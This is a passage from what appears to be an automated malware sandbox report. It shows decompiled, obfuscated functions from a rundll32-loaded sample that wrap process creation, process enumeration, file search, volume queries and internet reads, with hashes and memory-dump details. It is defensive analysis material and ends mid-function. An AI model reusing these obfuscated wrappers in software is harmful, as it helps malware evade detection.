Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: BC2115B5D0020CFBDB08DFA4C94A9EEBBB4EB44304F108189E425A7240E3B56B149F91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 772 Parent PID: 6780 rundll32.exeCOMMON

Executed Functions

Function 00B131D2, Relevance: 1.6, APIs: 1, Instructions: 77
processCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00B131D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t71;

				_push(_a56);
				_t71 = __edx;
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E00B12523(_t54);
				_v28 = 0x2cec17;
				_v24 = 0;
				_v16 = 0x5aadab;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x000031a8;
				_v12 = 0x82119f;
				_v12 = _v12 >> 2;
				_v12 = _v12 + 0xffff09c3;
				_t65 = 0x25;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x0004d7f2;
				_v8 = 0x7cd8a6;
				_v8 = _v8 >> 6;
				_v8 = _v8 | 0x702a8e48;
				_v8 = _v8 + 0xffff37f0;
				_v8 = _v8 ^ 0x702d019b;
				_v20 = 0x367fb2;
				_v20 = _v20 + 0xffff7ba2;
				_v20 = _v20 ^ 0x003ae9c9;
				E00AF2309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
				return _t63;
			}

0x00b131da
0x00b131df
0x00b131e1
0x00b131e4
0x00b131e7
0x00b131e8
0x00b131e9
0x00b131ec
0x00b131ef
0x00b131f2
0x00b131f3
0x00b131f4
0x00b131f7
0x00b131fa
0x00b131fd
0x00b131fe
0x00b13200
0x00b13205
0x00b1320f
0x00b13214
0x00b1321b
0x00b1321f
0x00b13223
0x00b1322a
0x00b13231
0x00b13235
0x00b13241
0x00b13249
0x00b1324c
0x00b13253
0x00b1325a
0x00b1325e
0x00b13265
0x00b1326c
0x00b13273
0x00b1327a
0x00b13281
0x00b132a1
0x00b132bb
0x00b132c2

APIs

CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 00B132BB

Memory Dump Source

Source File: 00000009.00000002.471569370.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: true

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: 817138b6aae9050f66599ad4f9218db662dfffa7f424c9a7a0795935707a3771
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: AC311672801248BBCF65DF96CD49CDFBFB5FB99704F108188F91466220D3B58A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AF4248, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AF4248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E00AF2309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
				ExitProcess(0);
			}

0x00af424e
0x00af4254
0x00af425b
0x00af4262
0x00af4269
0x00af4272
0x00af4277
0x00af427c
0x00af4283
0x00af428a
0x00af4291
0x00af4298
0x00af42a2
0x00af42aa
0x00af42ad
0x00af42b1
0x00af42b5
0x00af42bc
0x00af42c3
0x00af42c7
0x00af42e7
0x00af42f1

APIs

ExitProcess.KERNEL32(00000000), ref: 00AF42F1

Memory Dump Source

Source File: 00000009.00000002.471569370.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: true

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: 95d111296a71be4290df4a0d80eff101a570d7d14c37e2c943fe116e6b34e972
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: 6C1128B5E00208EBDB44DFE5D94AAEEBBF1FB44308F208189E515A7240D7B45B18CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B017CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00B017CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E00B12523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E00AF2309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

0x00b017d2
0x00b017d5
0x00b017d7
0x00b017db
0x00b017dc
0x00b017e1
0x00b017e8
0x00b017f1
0x00b017f8
0x00b017ff
0x00b01803
0x00b01807
0x00b0180e
0x00b0181b
0x00b01822
0x00b01825
0x00b0182c
0x00b01833
0x00b01844
0x00b01847
0x00b01859
0x00b0185c
0x00b01863
0x00b0186a
0x00b0186e
0x00b01881
0x00b0188d
0x00b01893

APIs

lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 00B0188D

Memory Dump Source

Source File: 00000009.00000002.471569370.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: true

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: e8832decb2298e9ee18e0cd7501c1198b7cc86e633cb7bc5389bc6822a8c06fa
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 7E2124B5D0020CFFDB08DFA4C94A9EEBBB5EB44304F208189E425B7240E3B56B149FA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 5732 Parent PID: 772 rundll32.exeCOMMON

Executed Functions

Function 00EA1A80, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
fileCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00EA1A80(void* __ecx, struct _WIN32_FIND_DATAW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t44;
				void* _t55;
				signed int _t57;
				struct _WIN32_FIND_DATAW* _t63;

				_push(_a16);
				_t63 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00EB2523(_t44);
				_v36 = 0x40784c;
				asm("stosd");
				asm("stosd");
				_t57 = 0x66;
				asm("stosd");
				_v8 = 0xc58147;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 6;
				_v8 = _v8 + 0xffff0e61;
				_v8 = _v8 ^ 0xffff2899;
				_v16 = 0x3eee0f;
				_v16 = _v16 ^ 0xf4098113;
				_v16 = _v16 * 0x76;
				_v16 = _v16 ^ 0x918df00d;
				_v12 = 0x61adbd;
				_v12 = _v12 | 0x1ce5c3f2;
				_v12 = _v12 ^ 0x5ce6c57a;
				_v12 = _v12 ^ 0x400dc737;
				_v20 = 0x919b51;
				_v20 = _v20 + 0x9c69;
				_v20 = _v20 ^ 0x00927a19;
				E00E92309(0x352, _t57, _t57, 0x810611c3, _t57, 0x9c9047d0);
				_t55 = FindFirstFileW(_a16, _t63); // executed
				return _t55;
			}

0x00ea1a88
0x00ea1a8b
0x00ea1a8d
0x00ea1a90
0x00ea1a93
0x00ea1a96
0x00ea1a98
0x00ea1a9d
0x00ea1aac
0x00ea1ab1
0x00ea1ab2
0x00ea1ab9
0x00ea1aba
0x00ea1acb
0x00ea1ace
0x00ea1ad2
0x00ea1ad9
0x00ea1ae0
0x00ea1ae7
0x00ea1af9
0x00ea1afc
0x00ea1b03
0x00ea1b0a
0x00ea1b11
0x00ea1b18
0x00ea1b1f
0x00ea1b26
0x00ea1b2d
0x00ea1b40
0x00ea1b4c
0x00ea1b53

APIs

FindFirstFileW.KERNEL32(00E9CC4B,?,?,?,?,?,?,?,?,?,?,09AB8BF6,00000072), ref: 00EA1B4C

Strings

Lx@, xrefs: 00EA1A9D

Memory Dump Source

Source File: 00000010.00000002.868241102.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: true

Similarity

API ID: FileFindFirst
String ID: Lx@
API String ID: 1974802433-402333656
Opcode ID: 36fdb602463615d85640dee2202416375b56d64be84a9f72e6469216861f4ee0
Instruction ID: b85f8127167a3f015fee0b5175dbf3b82356cc7b3983518ac30d9305212aafe0
Opcode Fuzzy Hash: 36fdb602463615d85640dee2202416375b56d64be84a9f72e6469216861f4ee0
Instruction Fuzzy Hash: 10213475D01209EBDB18CFA5DC4A8DEBBB4FB44300F008188E411A6260D3B59B54DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EB1027, Relevance: 1.6, APIs: 1, Instructions: 57
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00EB1027(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, long _a12, intOrPtr _a16, intOrPtr _a20, DWORD* _a24) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t46;
				int _t55;
				signed int _t57;
				void* _t62;

				_push(_a24);
				_t62 = __ecx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00EB2523(_t46);
				_v12 = 0xd4e775;
				_v12 = _v12 ^ 0x9fa1d679;
				_v12 = _v12 + 0xffffd43b;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x000b9d33;
				_v20 = 0xb1fd06;
				_v20 = _v20 + 0xffff1766;
				_v20 = _v20 ^ 0x00bd550d;
				_v16 = 0x2d7499;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0x749af706;
				_v8 = 0x5dfa4b;
				_t57 = 0x11;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 | 0xef9b7d02;
				_v8 = _v8 ^ 0xef9457ed;
				E00E92309(0x254, _t57, _t57, 0xf677e454, _t57, 0xc0cf1a4);
				_t55 = InternetReadFile(_t62, _a8, _a12, _a24); // executed
				return _t55;
			}

0x00eb102e
0x00eb1031
0x00eb1033
0x00eb1036
0x00eb1039
0x00eb103c
0x00eb103f
0x00eb1043
0x00eb1044
0x00eb1049
0x00eb1053
0x00eb105c
0x00eb1063
0x00eb1067
0x00eb106e
0x00eb1075
0x00eb107c
0x00eb1083
0x00eb108a
0x00eb108e
0x00eb1095
0x00eb10a1
0x00eb10a9
0x00eb10ac
0x00eb10b0
0x00eb10b7
0x00eb10d7
0x00eb10e9
0x00eb10ef

APIs

InternetReadFile.WININET(?,749AF706,00BD550D,?), ref: 00EB10E9

Memory Dump Source

Source File: 00000010.00000002.868241102.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: true

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 2d4f4d84a63d0f13ac273aada7b35ede13ebed0102486743890e3910fc006acb
Instruction ID: b6a2cb3139f064491565a031df151c6c0ce12c22e22b62ac47f8861eee5508a8
Opcode Fuzzy Hash: 2d4f4d84a63d0f13ac273aada7b35ede13ebed0102486743890e3910fc006acb
Instruction Fuzzy Hash: 2C2113B6D00209BBDF06DFE4C94A8EEBBB1EF44300F108189F92566251E3B55B61EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00EA1B54, Relevance: 1.5, APIs: 1, Instructions: 47
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EA1B54(int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t51;
				signed int _t52;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x604094;
				_v32 = 0x94e455;
				_v28 = 0xad6ab3;
				_v8 = 0x1f2344;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 << 0xe;
				_t52 = 0x3c;
				_v8 = _v8 * 0x16;
				_v8 = _v8 ^ 0x0ab2d5aa;
				_v20 = 0xb8d8f1;
				_v20 = _v20 ^ 0x9bb5e2ea;
				_v20 = _v20 ^ 0x9b0a37ea;
				_v16 = 0x527695;
				_v16 = _v16 << 1;
				_v16 = _v16 / _t52;
				_v16 = _v16 ^ 0x000d80fe;
				_v12 = 0xedaf67;
				_v12 = _v12 ^ 0xb485e6d8;
				_v12 = _v12 + 0xffff9be0;
				_v12 = _v12 ^ 0xb46ea43d;
				E00E92309(0x190, _t52, _t52, 0xbde7009f, _t52, 0x9c9047d0);
				_t51 = CreateToolhelp32Snapshot(_a4, 0); // executed
				return _t51;
			}

0x00ea1b5a
0x00ea1b60
0x00ea1b67
0x00ea1b6e
0x00ea1b75
0x00ea1b7c
0x00ea1b80
0x00ea1b8a
0x00ea1b91
0x00ea1b94
0x00ea1b9b
0x00ea1ba2
0x00ea1ba9
0x00ea1bb0
0x00ea1bb7
0x00ea1bc4
0x00ea1bc7
0x00ea1bce
0x00ea1bd5
0x00ea1bdc
0x00ea1be3
0x00ea1bfd
0x00ea1c0a
0x00ea1c0f

APIs

CreateToolhelp32Snapshot.KERNEL32(B46EA43D,00000000), ref: 00EA1C0A

Memory Dump Source

Source File: 00000010.00000002.868241102.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: true

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: 8dbd4dee2a96a2a279b30488413906bed3e520bcc45b322a8894c97035d3b5c6
Instruction ID: d1a98a9670c6f3b7ed7c0231d30c975055be45b0a6ff9bf76da00774e97889c8
Opcode Fuzzy Hash: 8dbd4dee2a96a2a279b30488413906bed3e520bcc45b322a8894c97035d3b5c6
Instruction Fuzzy Hash: C811F3B1D0520CEBDB18DFA8C94A5AEBBB0FF44304F108199E521B72A0D7B55B04DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00E954DA, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57
networkCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00E954DA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t52;
				int _t63;
				signed int _t65;
				signed int _t66;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E00EB2523(_t52);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x6eade3;
				_v20 = 0x70ee4c;
				_v20 = _v20 + 0xffffd19f;
				_v20 = _v20 ^ 0x007528c6;
				_v16 = 0x80bb49;
				_v16 = _v16 + 0xffff2cb2;
				_v16 = _v16 >> 4;
				_t65 = 0x3d;
				_v16 = _v16 / _t65;
				_v16 = _v16 ^ 0x000cd3d3;
				_v12 = 0x49bca9;
				_v12 = _v12 + 0x284b;
				_v12 = _v12 + 0x352d;
				_v12 = _v12 ^ 0x5aa1db04;
				_v12 = _v12 ^ 0x5aee1bd2;
				_v8 = 0xbb5f19;
				_v8 = _v8 << 9;
				_v8 = _v8 | 0x616a7bee;
				_t39 =  &_v8; // 0x616a7bee
				_t66 = 0x5f;
				_v8 =  *_t39 / _t66;
				_v8 = _v8 ^ 0x01468cd5;
				E00E92309(_t66 + 0x22, _t66, _t66, 0x1d483158, _t66, 0xc0cf1a4);
				_t63 = InternetCloseHandle(_a12); // executed
				return _t63;
			}

0x00e954e0
0x00e954e3
0x00e954e6
0x00e954eb
0x00e954f0
0x00e954f7
0x00e95500
0x00e95507
0x00e9550e
0x00e95515
0x00e9551c
0x00e95523
0x00e9552c
0x00e95531
0x00e95536
0x00e9553d
0x00e95544
0x00e9554b
0x00e95552
0x00e95559
0x00e95560
0x00e95567
0x00e9556b
0x00e95572
0x00e95575
0x00e9557d
0x00e95580
0x00e9559e
0x00e955a9
0x00e955ae

APIs

InternetCloseHandle.WININET(007528C6), ref: 00E955A9

Strings

Lp, xrefs: 00E95500
-5, xrefs: 00E9554B
{ja, xrefs: 00E95572

Memory Dump Source

Source File: 00000010.00000002.868241102.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: true

Similarity

API ID: CloseHandleInternet
String ID: -5$Lp${ja
API String ID: 1081599783-1222928185
Opcode ID: 96c25ca98efac3a213f8ce2c5c378593396d62ac674d19cb573e17f5676fb90f
Instruction ID: 2ddbf17a2075415cdc81cdf528249716af1ca4be2b692d36a4dc67b8d3e49ef1
Opcode Fuzzy Hash: 96c25ca98efac3a213f8ce2c5c378593396d62ac674d19cb573e17f5676fb90f
Instruction Fuzzy Hash: 1621F3B6D0120DABDF04DFE5C94A9AEBBB1EB10314F108199A520A6251E3B95B14CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00EAF606, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00EAF606(void* __ecx, void* __edx, struct tagPROCESSENTRY32W* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t43;
				void* _t50;
				void* _t54;

				_push(_a8);
				_t54 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00EB2523(_t43);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0xf33a94;
				_v8 = 0x16e1c5;
				_v8 = _v8 << 0x10;
				_v8 = _v8 + 0xffff7501;
				_v8 = _v8 * 0x3d;
				_v8 = _v8 ^ 0xcbc2f299;
				_v20 = 0x18380a;
				_v20 = _v20 + 0x556a;
				_v20 = _v20 ^ 0x2e444359;
				_v20 = _v20 ^ 0x2e5734c8;
				_v16 = 0x1de0f;
				_v16 = _v16 + 0xffff3d0f;
				_v16 = _v16 ^ 0x5b4c4104;
				_v16 = _v16 ^ 0x5b45396c;
				_v12 = 0x8d2c67;
				_v12 = _v12 | 0x6bb36e73;
				_v12 = _v12 ^ 0x44de99d4;
				_v12 = _v12 ^ 0x2f6e43e4;
				_t50 = E00E92309(0x343, __ecx, __ecx, 0x1a63a552, __ecx, 0x9c9047d0);
				Process32FirstW(_t54, _a4); // executed
				return _t50;
			}

0x00eaf60d
0x00eaf610
0x00eaf612
0x00eaf615
0x00eaf616
0x00eaf617
0x00eaf61c
0x00eaf623
0x00eaf627
0x00eaf62e
0x00eaf635
0x00eaf639
0x00eaf650
0x00eaf653
0x00eaf65a
0x00eaf661
0x00eaf668
0x00eaf66f
0x00eaf676
0x00eaf67d
0x00eaf684
0x00eaf68b
0x00eaf692
0x00eaf699
0x00eaf6a0
0x00eaf6a7
0x00eaf6c0
0x00eaf6cc
0x00eaf6d2

APIs

Process32FirstW.KERNEL32(00000000,2F6E43E4,?,?,?,?,?,?,?,?,00000000), ref: 00EAF6CC

Strings

Cn/, xrefs: 00EAF6A7
YCD., xrefs: 00EAF668
l9E[, xrefs: 00EAF68B

Memory Dump Source

Source File: 00000010.00000002.868241102.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: true

Similarity

API ID: FirstProcess32
String ID: YCD.$l9E[$Cn/
API String ID: 2623510744-4191728293
Opcode ID: ba6908419aca7e40de5752100cf2159fdf1c013576c21fa5a45c6b552e88f8aa
Instruction ID: d4407f399101126709c8f7a7bd2a3a2a25cbb792b633caa4b3fe914a1facc71a
Opcode Fuzzy Hash: ba6908419aca7e40de5752100cf2159fdf1c013576c21fa5a45c6b552e88f8aa
Instruction Fuzzy Hash: E82122B6C01219EBCF08DFE4D94A9AEBBB4EF10715F108689E515B6211D3745B109F91

Uniqueness

Uniqueness Score: -1.00%

Function 00EAA809, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00EAA809(DWORD* __ecx, void* __edx, intOrPtr _a12, WCHAR* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t45;
				int _t55;
				DWORD* _t60;

				_t60 = __ecx;
				_push(0);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E00EB2523(_t45);
				_v36 = 0x72e62c;
				_v32 = 0x6afee3;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0x241442;
				_v12 = _v12 ^ 0x5f0a7563;
				_v12 = _v12 * 0x4b;
				_v12 = _v12 + 0xffff00d5;
				_v12 = _v12 ^ 0xe298fffa;
				_v20 = 0x629ccf;
				_v20 = _v20 + 0xa262;
				_v20 = _v20 ^ 0x006504c5;
				_v8 = 0x8dfd52;
				_v8 = _v8 * 0x5f;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 << 0xd;
				_v8 = _v8 ^ 0x1a5bea6c;
				_v16 = 0x13a484;
				_v16 = _v16 * 0x42;
				_v16 = _v16 ^ 0x051e7b21;
				E00E92309(0x1c8, __ecx, __ecx, 0xfc0d3d9c, __ecx, 0x9c9047d0);
				_t55 = GetVolumeInformationW(_a16, 0, 0, _t60, 0, 0, 0, 0); // executed
				return _t55;
			}

0x00eaa813
0x00eaa815
0x00eaa816
0x00eaa817
0x00eaa81a
0x00eaa81d
0x00eaa81e
0x00eaa81f
0x00eaa822
0x00eaa825
0x00eaa828
0x00eaa82b
0x00eaa82e
0x00eaa82f
0x00eaa831
0x00eaa832
0x00eaa837
0x00eaa841
0x00eaa848
0x00eaa84b
0x00eaa84e
0x00eaa855
0x00eaa86c
0x00eaa86f
0x00eaa876
0x00eaa87d
0x00eaa884
0x00eaa88b
0x00eaa892
0x00eaa8a3
0x00eaa8a6
0x00eaa8aa
0x00eaa8ae
0x00eaa8b5
0x00eaa8c0
0x00eaa8c3
0x00eaa8d6
0x00eaa8e8
0x00eaa8ef

APIs

GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00EAA8E8

Strings

cu_, xrefs: 00EAA855
,r, xrefs: 00EAA837

Memory Dump Source

Source File: 00000010.00000002.868241102.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: true

Similarity

API ID: InformationVolume
String ID: ,r$cu_
API String ID: 2039140958-355032270
Opcode ID: 11f0a768391377fe69868ce35b1527178b61e9fcd2d284546a7f3ae16540a2da
Instruction ID: 3de95e7163e2af1cb8271d0e025f820b333d7f85a9106e1af44334a4bd11f536
Opcode Fuzzy Hash: 11f0a768391377fe69868ce35b1527178b61e9fcd2d284546a7f3ae16540a2da
Instruction Fuzzy Hash: 9A21E3B1801249BBCF14CFA6DD49CDFBFB9EB86704F108099F910A2220D3B59A15DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E9FBFA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00E9FBFA(void* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t48;
				int _t57;
				signed int _t59;

				_push(_a8);
				_push(_a4);
				E00EB2523(_t48);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x49672e;
				_v32 = 0xb6dd69;
				_v16 = 0x714492;
				_v16 = _v16 >> 4;
				_v16 = _v16 + 0x8cae;
				_v16 = _v16 + 0xf12f;
				_v16 = _v16 ^ 0x0001c43a;
				_v20 = 0xe1aff5;
				_v20 = _v20 + 0x563d;
				_v20 = _v20 ^ 0x00ec4f92;
				_v12 = 0xff415;
				_v12 = _v12 + 0x39cf;
				_v12 = _v12 | 0x79f6ff5d;
				_v12 = _v12 ^ 0x79f7d296;
				_v8 = 0xdebe32;
				_t59 = 0x1e;
				_v8 = _v8 / _t59;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 ^ 0x0002d9b6;
				E00E92309(0x336, _t59, _t59, 0xd09d8658, _t59, 0x9c9047d0);
				_t57 = FindClose(_a8); // executed
				return _t57;
			}

0x00e9fc00
0x00e9fc03
0x00e9fc08
0x00e9fc0d
0x00e9fc14
0x00e9fc1a
0x00e9fc21
0x00e9fc28
0x00e9fc2f
0x00e9fc33
0x00e9fc3a
0x00e9fc41
0x00e9fc48
0x00e9fc4f
0x00e9fc56
0x00e9fc5d
0x00e9fc64
0x00e9fc6b
0x00e9fc72
0x00e9fc79
0x00e9fc85
0x00e9fc8d
0x00e9fc90
0x00e9fc94
0x00e9fc98
0x00e9fcb8
0x00e9fcc3
0x00e9fcc8

APIs

FindClose.KERNEL32(0001C43A), ref: 00E9FCC3

Strings

.gI, xrefs: 00E9FC1A
=V, xrefs: 00E9FC4F

Memory Dump Source

Source File: 00000010.00000002.868241102.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: true

Similarity

API ID: CloseFind
String ID: .gI$=V
API String ID: 1863332320-2530093900
Opcode ID: 110af252eeec9babbf3e3997d431909c73a56f909e67471b0c3fb51db6a30985
Instruction ID: 4c5d6cf3b3978483f7936aa252fb24531769f0ff10a3c5cacdaa98ba0ce7983a
Opcode Fuzzy Hash: 110af252eeec9babbf3e3997d431909c73a56f909e67471b0c3fb51db6a30985
Instruction Fuzzy Hash: B22122B1D0120CEFEB04DFD5C94AAEEBBB0FB54318F10C099E62466240E3B95B589F90

Uniqueness

Uniqueness Score: -1.00%

Function 00EAE9E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
fileCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00EAE9E8(void* __ecx, void* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t39;
				int _t47;
				void* _t51;

				_push(_a16);
				_t51 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00EB2523(_t39);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x7dd1c2;
				_v20 = 0xe6ed41;
				_v20 = _v20 ^ 0x6eedbecd;
				_v20 = _v20 * 0x45;
				_v20 = _v20 ^ 0xa90eba26;
				_v16 = 0x25fde1;
				_v16 = _v16 + 0xffffc5d1;
				_v16 = _v16 | 0x325ad611;
				_v16 = _v16 ^ 0x3277e624;
				_v8 = 0x448e1b;
				_v8 = _v8 | 0xd7f3ffef;
				_v8 = _v8 ^ 0xcff08007;
				_v8 = _v8 ^ 0x180d74c6;
				_v12 = 0x3a9cbc;
				_v12 = _v12 | 0xfe729dd7;
